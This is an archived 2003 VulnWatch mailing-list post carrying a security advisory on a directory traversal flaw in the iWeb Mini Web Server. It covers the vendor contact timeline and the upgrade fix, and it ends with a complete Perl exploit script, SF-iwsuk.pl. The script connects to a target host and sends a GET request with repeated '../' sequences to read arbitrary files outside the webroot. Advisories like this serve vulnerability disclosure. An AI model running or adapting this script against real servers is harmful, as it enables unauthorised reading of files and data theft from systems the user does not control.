From subversive@linuxmail.org Wed Apr 16 03:28:46 2003 From: subversive X-Originating-IP: 139.80.123.36 To: vulnwatch@vulnwatch.org Date: Wed, 16 Apr 2003 16:24:13 +1200 Subject: [VulnWatch] SFAD03-001: iWeb Mini Web Server Remote Directory Traversal [ The following text is in the "iso-8859-1" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] [=================================================================] [...............:[ S e c u r i t y F r e a k s ]:...............] [.................:[ www.securityfreaks.com ]:..................] [=================================================================] Title : iWeb Mini Web Server Remote Directory Traversal Risk : Moderate - Low Software : iWeb Mini Web Server Platforms : Windows NT/XP/9x Vendor URL : http://www.ashleybrown.co.uk/iweb/ Discovered by : subversive Advisory ID : SFAD03-001 .....:[ Overview : The iWeb Mini Web Server is a mini web server designed for use on Intranets and for testing websites in a realistic environment. .....:[ Details : iWeb does not correctly filter GET requests for ../ characters thereby allowing us to escape the webroot and remotely traverse the directory structure of the remote host. .....:[ Vendor Status : 14/04/03 Initial Contact Made 15/04/03 Vendor Responded 15/04/03 Vendor Released Updated Version .....:[ Solution : Remove old iWeb application and download and install the updated version which can be found at: http://ashleybrown.co.uk/downloads/iws2.exe .....:[ Exploit - SF-iwsuk.pl : #!/usr/bin/perl -w # # S e c u r i t y F r e a k s # www.securityfreaks.com # # iWeb Mini Web Server Remote Directory Traversal # # subversive[at]linuxmail.org - *15/04/2003* use IO::Socket; if(!$ARGV[0]) { print <<"IWEBSUK"; S e c u r i t y F r e a k s www.securityfreaks.com ------------------------------------------------------------- SF-iwsuk.pl - iWeb Mini Web Server Remote Directory Traversal ------------------------------------------------------------- Usage: $0 IWEBSUK exit; } else{ $host = $ARGV[0]; } if(!$ARGV[2]) { $port = "80"; } else { $port = $ARGV[2]; } my $sock = new IO::Socket::INET ( Proto => "tcp", PeerAddr => $host, PeerPort => $port, ); die "\nConnection to $host:$port failed\n" unless $sock; print $sock "GET /../../../../../../../../../$ARGV[1] HTTP/1.0\n\n"; while(<$sock>) { print } close($sock); print("\n\n"); exit; -- ______________________________________________ http://www.linuxmail.org/ Now with e-mail forwarding for only US$5.95/yr Powered by Outblaze